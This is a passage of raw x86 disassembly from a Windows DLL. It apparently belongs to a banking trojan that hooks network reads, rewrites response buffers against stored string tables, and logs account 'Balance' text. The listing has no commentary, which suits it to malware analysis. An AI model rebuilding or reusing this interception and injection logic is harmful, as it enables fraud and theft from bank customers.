mov [ebp+var_50], 28h
loc_1001099D: ; CODE XREF: sub_100108A3+17C�j
mov ecx, [ebp+arg_4]
mov edx, [ecx+18h]
mov eax, dword_10073DF8
lea ecx, [eax+edx+1]
push ecx ; NewSize
mov edx, Memory
push edx ; Memory
call ds:realloc ; realloc
add esp, 8
mov Memory, eax
mov eax, Memory
add eax, dword_10073DF8
mov [ebp+var_3C], eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+18h]
mov [ebp+var_38], edx
mov eax, [ebp+arg_C]
push eax
push 0
lea ecx, [ebp+var_50]
push ecx
mov edx, [ebp+arg_0]
push edx
call dword_10073DCC
test eax, eax
jnz short loc_10010A0C
call ds:GetLastError
cmp eax, 3E5h
jnz short loc_10010A0C
push 0FFFFFFFFh ; dwMilliseconds
mov eax, hEvent
push eax ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
loc_10010A0C: ; CODE XREF: sub_100108A3+14C�j
; sub_100108A3+159�j
mov ecx, dword_10073DF8
add ecx, [ebp+var_38]
mov dword_10073DF8, ecx
cmp [ebp+var_38], 0
jnz loc_1001099D
mov edx, dword_10073E00
add edx, 1
mov dword_10073E00, edx
mov eax, Memory
add eax, dword_10073DF8
mov byte ptr [eax], 0
loc_10010A42: ; CODE XREF: sub_100108A3+ED�j
cmp dword_10073E00, 2
jnz loc_10011142
cmp dword_10073DF4, 0
jnz loc_10011082
mov [ebp+Size], 0
mov [ebp+lpString2], 0
mov [ebp+var_60], 0
mov [ebp+var_5C], 0
mov [ebp+var_28], 0
loc_10010A7F: ; CODE XREF: sub_100108A3+7DA�j
mov ecx, [ebp+var_28]
cmp dword_10073A5C[ecx*4], 0
jz loc_10011082
cmp [ebp+var_28], 190h
jge loc_10011082
mov edx, [ebp+var_28]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax+8]
cmp ecx, [ebp+arg_0]
jnz loc_10011074
mov edx, [ebp+var_28]
mov eax, dword_10073A5C[edx*4]
cmp dword ptr [eax], 0
jl loc_10010F25
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
cmp dword ptr [edx], 3E8h
jge loc_10010D39
mov eax, Memory
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx]
mov ecx, dword_10034464[eax*4]
mov edx, [ecx+8]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
imul eax, 0Ah
lea eax, [esi+eax+1]
mov [ebp+Size], eax
mov ecx, [ebp+Size]
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString2], eax
mov edx, [ebp+Size]
push edx ; Size
push 0 ; Val
mov eax, [ebp+lpString2]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
cmp dword ptr [edx+10h], 0
jnz short loc_10010B87
mov eax, [ebp+lpString2]
push eax
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx]
mov ecx, dword_10034464[eax*4]
mov edx, [ecx+8]
push edx
mov eax, [ebp+var_28]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx]
mov eax, dword_10034464[edx*4]
mov ecx, [eax+4]
push ecx
mov edx, Memory
push edx
call sub_1000F372
add esp, 10h
mov [ebp+var_60], eax
loc_10010B87: ; CODE XREF: sub_100108A3+29E�j
mov eax, [ebp+var_28]
mov ecx, dword_10073A5C[eax*4]
cmp dword ptr [ecx+10h], 1
jnz short loc_10010BDB
mov edx, [ebp+lpString2]
push edx
mov eax, [ebp+var_28]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx]
mov eax, dword_10034464[edx*4]
mov ecx, [eax+8]
push ecx
mov edx, [ebp+var_28]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax]
mov edx, dword_10034464[ecx*4]
mov eax, [edx+4]
push eax
mov ecx, Memory
push ecx
call sub_1000F5B1
add esp, 10h
mov [ebp+var_60], eax
loc_10010BDB: ; CODE XREF: sub_100108A3+2F2�j
cmp [ebp+var_60], 0
jz short loc_10010C43
mov edx, [ebp+Size]
push edx ; NewSize
mov eax, Memory
push eax ; Memory
call ds:realloc ; realloc
add esp, 8
mov Memory, eax
mov ecx, [ebp+Size]
push ecx ; Size
push 0 ; Val
mov edx, Memory
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov eax, [ebp+lpString2]
push eax ; lpString2
mov ecx, Memory
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, Memory
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov dword_10073DF8, eax
mov eax, [ebp+var_28]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx]
mov dword_10022110, edx
loc_10010C43: ; CODE XREF: sub_100108A3+33C�j
push offset a1_0 ; "1"
mov eax, [ebp+var_28]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx]
mov eax, dword_10034464[edx*4]
mov ecx, [eax+24h]
push ecx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz loc_10010D20
cmp [ebp+var_5C], 0
jnz loc_10010D20
cmp [ebp+var_60], 0
jz loc_10010D20
mov edx, [ebp+var_5C]
add edx, 1
mov [ebp+var_5C], edx
push 0Ch ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpParameter], eax
mov eax, [ebp+lpParameter]
mov dword ptr [eax], 0
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+4]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+lpParameter]
mov [ecx+4], eax
push 4 ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+lpParameter]
mov [edx+8], eax
push 4 ; Size
push 0 ; Val
mov eax, [ebp+lpParameter]
mov ecx, [eax+8]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
mov edx, [ebp+var_28]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax+4]
push ecx ; lpString2
mov edx, [ebp+lpParameter]
mov eax, [edx+4]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov ecx, [ebp+lpParameter]
push ecx ; lpParameter
push offset sub_10010623 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
loc_10010D20: ; CODE XREF: sub_100108A3+3C6�j
; sub_100108A3+3D0�j ...
mov edx, [ebp+lpString2]
push edx ; Memory
call ds:free ; free
add esp, 4
mov [ebp+lpString2], 0
jmp loc_10010EE7
; ---------------------------------------------------------------------------
loc_10010D39: ; CODE XREF: sub_100108A3+233�j
mov eax, Memory
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx]
mov ecx, dword_10035404[eax*4]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
lea edx, [esi+eax+1]
mov [ebp+Size], edx
mov eax, [ebp+Size]
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString2], eax
mov ecx, [ebp+Size]
push ecx ; Size
push 0 ; Val
mov edx, [ebp+lpString2]
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov eax, [ebp+var_28]
mov ecx, dword_10073A5C[eax*4]
cmp dword ptr [ecx+10h], 2
jnz loc_10010E44
mov edx, [ebp+lpString2]
push edx
mov eax, [ebp+var_28]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx]
mov eax, dword_10035A44[edx*4]
push eax
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx]
mov ecx, dword_10034DC4[eax*4]
push ecx
mov edx, Memory
push edx
call sub_1000F7FE
add esp, 10h
mov [ebp+var_60], eax
cmp [ebp+var_60], 0
jz short loc_10010E3F
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset asc_10023744 ; "---------------"
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
mov eax, [ebp+var_28]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx+4]
push edx ; Source
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset aBalance ; "--------------\r\nBalance :\r\n"
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
mov eax, [ebp+lpString2]
push eax ; Source
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset asc_10023770 ; "\r\n\r\n\r\n"
call sub_1000291D
add esp, 0Ch
loc_10010E3F: ; CODE XREF: sub_100108A3+53D�j
jmp loc_10010ED3
; ---------------------------------------------------------------------------
loc_10010E44: ; CODE XREF: sub_100108A3+4F5�j
mov ecx, [ebp+lpString2]
push ecx
mov edx, [ebp+var_28]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax]
mov edx, dword_10035404[ecx*4]
push edx
mov eax, [ebp+var_28]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx]
mov eax, dword_10034DC4[edx*4]
push eax
mov ecx, Memory
push ecx
call sub_1000F372
add esp, 10h
test eax, eax
jz short loc_10010ED3
mov edx, [ebp+Size]
push edx ; NewSize
mov eax, Memory
push eax ; Memory
call ds:realloc ; realloc
add esp, 8
mov Memory, eax
mov ecx, [ebp+Size]
push ecx ; Size
push 0 ; Val
mov edx, Memory
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov eax, [ebp+lpString2]
push eax ; lpString2
mov ecx, Memory
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, Memory
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov dword_10073DF8, eax
loc_10010ED3: ; CODE XREF: sub_100108A3:loc_10010E3F�j
; sub_100108A3+5DE�j
mov eax, [ebp+lpString2]
push eax ; Memory
call ds:free ; free
add esp, 4
mov [ebp+lpString2], 0
loc_10010EE7: ; CODE XREF: sub_100108A3+491�j
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+4]
push eax ; Memory
call ds:free ; free
add esp, 4
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
push edx ; Memory
call ds:free ; free
add esp, 4
mov eax, [ebp+var_28]
mov dword_10073A5C[eax*4], 0
jmp loc_10011074
; ---------------------------------------------------------------------------
loc_10010F25: ; CODE XREF: sub_100108A3+21D�j
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
cmp dword ptr [edx], 0FFFFFFFEh
jnz loc_10011074
mov [ebp+var_68], 0
loc_10010F3F: ; CODE XREF: sub_100108A3+7CC�j
cmp [ebp+var_68], 32h
jge loc_10011074
mov eax, [ebp+var_68]
mov ecx, dword_10034364[eax*4]
cmp dword ptr [ecx], 0
jz loc_10011074
mov edx, Memory
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
mov eax, [ebp+var_68]
mov ecx, dword_10034364[eax*4]
mov edx, [ecx]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
add esi, eax
mov eax, [ebp+var_68]
mov ecx, dword_10034364[eax*4]
mov edx, [ecx+4]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
lea eax, [esi+eax+1]
mov [ebp+Size], eax
mov ecx, [ebp+Size]
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString2], eax
mov edx, [ebp+Size]
push edx ; Size
push 0 ; Val
mov eax, [ebp+lpString2]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+var_6C], 0
mov ecx, [ebp+lpString2]
push ecx
mov edx, [ebp+var_68]
mov eax, dword_10034364[edx*4]
mov ecx, [eax+4]
push ecx
mov edx, [ebp+var_68]
mov eax, dword_10034364[edx*4]
mov ecx, [eax]
push ecx
mov edx, Memory
push edx
call sub_1000F5B1
add esp, 10h
mov [ebp+var_6C], eax
cmp [ebp+var_6C], 0
jz short loc_1001105B
mov eax, [ebp+Size]
push eax ; NewSize
mov ecx, Memory
push ecx ; Memory
call ds:realloc ; realloc
add esp, 8
mov Memory, eax
mov edx, [ebp+Size]
push edx ; Size
push 0 ; Val
mov eax, Memory
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+lpString2]
push ecx ; lpString2
mov edx, Memory
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov eax, Memory
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov dword_10073DF8, eax
mov ecx, [ebp+var_28]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx]
mov dword_10022110, eax
loc_1001105B: ; CODE XREF: sub_100108A3+756�j
mov ecx, [ebp+lpString2]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov [ebp+lpString2], 0
jmp loc_10010F3F
; ---------------------------------------------------------------------------
loc_10011074: ; CODE XREF: sub_100108A3+20A�j
; sub_100108A3+67D�j ...
mov edx, [ebp+var_28]
add edx, 1
mov [ebp+var_28], edx
jmp loc_10010A7F
; ---------------------------------------------------------------------------
loc_10011082: ; CODE XREF: sub_100108A3+1B3�j
; sub_100108A3+1E7�j ...
mov eax, dword_10073DF4
cmp eax, dword_10073DF8
jnb short loc_10011104
mov ecx, [ebp+arg_4]
mov edx, dword_10073DF4
add edx, [ecx+18h]
cmp edx, dword_10073DF8
jnb short loc_100110AE
mov eax, [ebp+arg_4]
mov ecx, [eax+18h]
mov [ebp+var_74], ecx
jmp short loc_100110BD
; ---------------------------------------------------------------------------
loc_100110AE: ; CODE XREF: sub_100108A3+7FE�j
mov edx, dword_10073DF8
sub edx, dword_10073DF4
mov [ebp+var_74], edx
loc_100110BD: ; CODE XREF: sub_100108A3+809�j
mov eax, [ebp+var_74]
mov [ebp+var_70], eax
mov ecx, [ebp+var_70]
push ecx ; Size
mov edx, Memory
add edx, dword_10073DF4
push edx ; Src
mov eax, [ebp+arg_4]
mov ecx, [eax+14h]
push ecx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov edx, dword_10073DF4
add edx, [ebp+var_70]
mov dword_10073DF4, edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_70]
mov [eax+18h], ecx
mov [ebp+var_24], 1
jmp short loc_10011142
; ---------------------------------------------------------------------------
loc_10011104: ; CODE XREF: sub_100108A3+7EA�j
mov dword_10073DF4, 0
mov dword_10073DF8, 0
mov [ebp+var_24], 0
mov edx, [ebp+arg_4]
mov dword ptr [edx+18h], 0
mov dword_10073E00, 0
mov eax, Memory
push eax ; Memory
call ds:free ; free
add esp, 4
loc_10011142: ; CODE XREF: sub_100108A3+1A6�j
; sub_100108A3+85F�j
mov [ebp+var_4], 0FFFFFFFFh
call nullsub_11
jmp short loc_10011151
sub_100108A3 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_11. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_100108A3
loc_10011151: ; CODE XREF: sub_100108A3+8AB�j
mov eax, [ebp+var_24]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; END OF FUNCTION CHUNK FOR sub_100108A3
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10011167(int, void *Dst, int, int)
sub_10011167 proc near ; DATA XREF: sub_1001338E+BA�o
; sub_100134D4+BA�o
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
lpParameter = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
lpString2 = dword ptr -5Ch
Size = dword ptr -58h
var_54 = dword ptr -54h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
Dst = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 10011A8D SIZE 00000016 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E548
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFF98h
push ebx
push esi
push edi
mov [ebp+var_20], 0
mov [ebp+var_24], 0
mov [ebp+var_2C], 0
mov [ebp+var_1C], 0FFFFFFFFh
mov [ebp+var_4], 0
cmp dword_10073DFC, 0
jnz loc_10011254
loc_100111BA: ; CODE XREF: sub_10011167+AB�j
mov eax, [ebp+var_2C]
cmp dword_10073A5C[eax*4], 0
jz short loc_10011214
cmp [ebp+var_2C], 190h
jge short loc_10011214
mov ecx, [ebp+var_2C]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+8]
cmp eax, [ebp+arg_0]
jnz short loc_10011209
mov ecx, [ebp+var_2C]
mov edx, dword_10073A5C[ecx*4]
cmp dword ptr [edx], 0FFFFFFFFh
jz short loc_10011209
mov eax, [ebp+var_2C]
mov [ebp+var_1C], eax
mov ecx, [ebp+var_2C]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+0Ch]
mov [ebp+var_24], eax
jmp short loc_10011214
; ---------------------------------------------------------------------------
loc_10011209: ; CODE XREF: sub_10011167+79�j
; sub_10011167+88�j
mov ecx, [ebp+var_2C]
add ecx, 1
mov [ebp+var_2C], ecx
jmp short loc_100111BA
; ---------------------------------------------------------------------------
loc_10011214: ; CODE XREF: sub_10011167+5E�j
; sub_10011167+67�j ...
cmp [ebp+var_1C], 0FFFFFFFFh
jz short loc_1001123B
push 10h ; Size
call ds:malloc ; malloc
add esp, 4
mov dword_10073DE4, eax
mov edx, dword_10073DFC
add edx, 1
mov dword_10073DFC, edx
jmp short loc_10011254
; ---------------------------------------------------------------------------
loc_1001123B: ; CODE XREF: sub_10011167+B1�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+Dst]
push edx
mov eax, [ebp+arg_0]
push eax
call dword_10073DC0
mov [ebp+var_28], eax
loc_10011254: ; CODE XREF: sub_10011167+4D�j
; sub_10011167+D2�j
cmp dword_10073DFC, 1
jnz loc_1001133A
loc_10011261: ; CODE XREF: sub_10011167+1B1�j
mov [ebp+var_54], 28h
push 0
push 0
lea ecx, [ebp+var_20]
push ecx
mov edx, [ebp+arg_0]
push edx
call dword_10073B70
test eax, eax
jnz short loc_10011299
call ds:GetLastError
cmp eax, 3E5h
jnz short loc_10011299
push 0FFFFFFFFh ; dwMilliseconds
mov eax, hEvent
push eax ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
loc_10011299: ; CODE XREF: sub_10011167+115�j
; sub_10011167+122�j
mov ecx, [ebp+var_20]
mov edx, dword_10073DF0
lea eax, [edx+ecx+1]
push eax ; NewSize
mov ecx, dword_10073DE4
push ecx ; Memory
call ds:realloc ; realloc
add esp, 8
mov dword_10073DE4, eax
mov edx, dword_10073DE4
add edx, dword_10073DF0
mov [ebp+var_40], edx
mov eax, [ebp+var_20]
mov [ebp+var_3C], eax
mov ecx, [ebp+var_24]
push ecx
push 0
lea edx, [ebp+var_54]
push edx
mov eax, [ebp+arg_0]
push eax
call dword_10073DCC
test eax, eax
jnz short loc_10011305
call ds:GetLastError
cmp eax, 3E5h
jnz short loc_10011305
push 0FFFFFFFFh ; dwMilliseconds
mov ecx, hEvent
push ecx ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
loc_10011305: ; CODE XREF: sub_10011167+180�j
; sub_10011167+18D�j
mov edx, dword_10073DF0
add edx, [ebp+var_3C]
mov dword_10073DF0, edx
cmp [ebp+var_20], 0
jnz loc_10011261
mov eax, dword_10073DFC
add eax, 1
mov dword_10073DFC, eax
mov ecx, dword_10073DE4
add ecx, dword_10073DF0
mov byte ptr [ecx], 0
loc_1001133A: ; CODE XREF: sub_10011167+F4�j
cmp dword_10073DFC, 2
jnz loc_10011A7E
cmp dword_10073DEC, 0
jnz loc_1001198D
mov [ebp+Size], 0
mov [ebp+lpString2], 0
mov [ebp+var_64], 0
mov [ebp+var_60], 0
mov [ebp+var_2C], 0
loc_10011377: ; CODE XREF: sub_10011167+80E�j
mov edx, [ebp+var_2C]
cmp dword_10073A5C[edx*4], 0
jz loc_1001197A
cmp [ebp+var_2C], 190h
jge loc_1001197A
mov eax, [ebp+var_2C]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx+8]
cmp edx, [ebp+arg_0]
jnz loc_1001196C
mov eax, [ebp+var_2C]
mov ecx, dword_10073A5C[eax*4]
cmp dword ptr [ecx], 0
jl loc_1001181B
mov edx, [ebp+var_2C]
mov eax, dword_10073A5C[edx*4]
cmp dword ptr [eax], 3E8h
jge loc_1001162F
mov ecx, dword_10073DE4
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
mov edx, [ebp+var_2C]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax]
mov edx, dword_10034464[ecx*4]
mov eax, [edx+8]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
imul eax, 0Ah
lea ecx, [esi+eax+1]
mov [ebp+Size], ecx
mov edx, [ebp+Size]
push edx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString2], eax
mov eax, [ebp+Size]
push eax ; Size
push 0 ; Val
mov ecx, [ebp+lpString2]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
mov edx, [ebp+var_2C]
mov eax, dword_10073A5C[edx*4]
cmp dword ptr [eax+10h], 0
jnz short loc_1001147F
mov ecx, [ebp+lpString2]
push ecx
mov edx, [ebp+var_2C]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax]
mov edx, dword_10034464[ecx*4]
mov eax, [edx+8]
push eax
mov ecx, [ebp+var_2C]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx]
mov ecx, dword_10034464[eax*4]
mov edx, [ecx+4]
push edx
mov eax, dword_10073DE4
push eax
call sub_1000F372
add esp, 10h
mov [ebp+var_64], eax
loc_1001147F: ; CODE XREF: sub_10011167+2D3�j
mov ecx, [ebp+var_2C]
mov edx, dword_10073A5C[ecx*4]
cmp dword ptr [edx+10h], 1
jnz short loc_100114D3
mov eax, [ebp+lpString2]
push eax
mov ecx, [ebp+var_2C]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx]
mov ecx, dword_10034464[eax*4]
mov edx, [ecx+8]
push edx
mov eax, [ebp+var_2C]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx]
mov eax, dword_10034464[edx*4]
mov ecx, [eax+4]
push ecx
mov edx, dword_10073DE4
push edx
call sub_1000F5B1
add esp, 10h
mov [ebp+var_64], eax
loc_100114D3: ; CODE XREF: sub_10011167+326�j
cmp [ebp+var_64], 0
jz short loc_10011539
mov eax, [ebp+Size]
push eax ; NewSize
mov ecx, dword_10073DE4
push ecx ; Memory
call ds:realloc ; realloc
add esp, 8
mov dword_10073DE4, eax
mov edx, [ebp+Size]
push edx ; Size
push 0 ; Val
mov eax, dword_10073DE4
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+lpString2]
push ecx ; lpString2
mov edx, dword_10073DE4
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov eax, dword_10073DE4
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov dword_10073DF0, eax
mov ecx, [ebp+var_2C]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx]
mov dword_10022110, eax
loc_10011539: ; CODE XREF: sub_10011167+370�j
push offset a1_1 ; "1"
mov ecx, [ebp+var_2C]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx]
mov ecx, dword_10034464[eax*4]
mov edx, [ecx+24h]
push edx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz loc_10011616
cmp [ebp+var_60], 0
jnz loc_10011616
cmp [ebp+var_64], 0
jz loc_10011616
mov eax, [ebp+var_60]
add eax, 1
mov [ebp+var_60], eax
push 0Ch ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpParameter], eax
mov ecx, [ebp+lpParameter]
mov dword ptr [ecx], 0
mov edx, [ebp+var_2C]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax+4]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+lpParameter]
mov [edx+4], eax
push 4 ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+lpParameter]
mov [ecx+8], eax
push 4 ; Size
push 0 ; Val
mov edx, [ebp+lpParameter]
mov eax, [edx+8]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+var_2C]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+4]
push eax ; lpString2
mov ecx, [ebp+lpParameter]
mov edx, [ecx+4]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov eax, [ebp+lpParameter]
push eax ; lpParameter
push offset sub_10010623 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
loc_10011616: ; CODE XREF: sub_10011167+3F8�j
; sub_10011167+402�j ...
mov ecx, [ebp+lpString2]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov [ebp+lpString2], 0
jmp loc_100117DD
; ---------------------------------------------------------------------------
loc_1001162F: ; CODE XREF: sub_10011167+267�j
mov edx, dword_10073DE4
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
mov eax, [ebp+var_2C]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx]
mov eax, dword_10035404[edx*4]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
lea ecx, [esi+eax+1]
mov [ebp+Size], ecx
mov edx, [ebp+Size]
push edx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString2], eax
mov eax, [ebp+Size]
push eax ; Size
push 0 ; Val
mov ecx, [ebp+lpString2]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
mov edx, [ebp+var_2C]
mov eax, dword_10073A5C[edx*4]
cmp dword ptr [eax+10h], 2
jnz loc_1001173B
mov ecx, [ebp+lpString2]
push ecx
mov edx, [ebp+var_2C]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax]
mov edx, dword_10035A44[ecx*4]
push edx
mov eax, [ebp+var_2C]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx]
mov eax, dword_10034DC4[edx*4]
push eax
mov ecx, dword_10073DE4
push ecx
call sub_1000F7FE
add esp, 10h
mov [ebp+var_64], eax
cmp [ebp+var_64], 0
jz short loc_10011736
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset asc_1002377C ; "---------------"
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
mov edx, [ebp+var_2C]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax+4]
push ecx ; Source
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset aBalance_0 ; "--------------\r\nBalance :\r\n"
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
mov edx, [ebp+lpString2]
push edx ; Source
call sub_1000291D
add esp, 0Ch
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset asc_100237A8 ; "\r\n\r\n\r\n"
call sub_1000291D
add esp, 0Ch
loc_10011736: ; CODE XREF: sub_10011167+570�j
jmp loc_100117C9
; ---------------------------------------------------------------------------
loc_1001173B: ; CODE XREF: sub_10011167+528�j
mov eax, [ebp+lpString2]
push eax
mov ecx, [ebp+var_2C]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx]
mov ecx, dword_10035404[eax*4]
push ecx
mov edx, [ebp+var_2C]
mov eax, dword_10073A5C[edx*4]
mov ecx, [eax]
mov edx, dword_10034DC4[ecx*4]
push edx
mov eax, dword_10073DE4
push eax
call sub_1000F372
add esp, 10h
test eax, eax
jz short loc_100117C9
mov ecx, [ebp+Size]
push ecx ; NewSize
mov edx, dword_10073DE4
push edx ; Memory
call ds:realloc ; realloc
add esp, 8
mov dword_10073DE4, eax
mov eax, [ebp+Size]
push eax ; Size
push 0 ; Val
mov ecx, dword_10073DE4
push ecx ; Dst
call memset ; memset
add esp, 0Ch
mov edx, [ebp+lpString2]
push edx ; lpString2
mov eax, dword_10073DE4
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov ecx, dword_10073DE4
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov dword_10073DF0, eax
loc_100117C9: ; CODE XREF: sub_10011167:loc_10011736�j
; sub_10011167+610�j
mov edx, [ebp+lpString2]
push edx ; Memory
call ds:free ; free
add esp, 4
mov [ebp+lpString2], 0
loc_100117DD: ; CODE XREF: sub_10011167+4C3�j
mov eax, [ebp+var_2C]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx+4]
push edx ; Memory
call ds:free ; free
add esp, 4
mov eax, [ebp+var_2C]
mov ecx, dword_10073A5C[eax*4]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, [ebp+var_2C]
mov dword_10073A5C[edx*4], 0
jmp loc_1001196C
; ---------------------------------------------------------------------------
loc_1001181B: ; CODE XREF: sub_10011167+251�j
mov eax, [ebp+var_2C]
mov ecx, dword_10073A5C[eax*4]
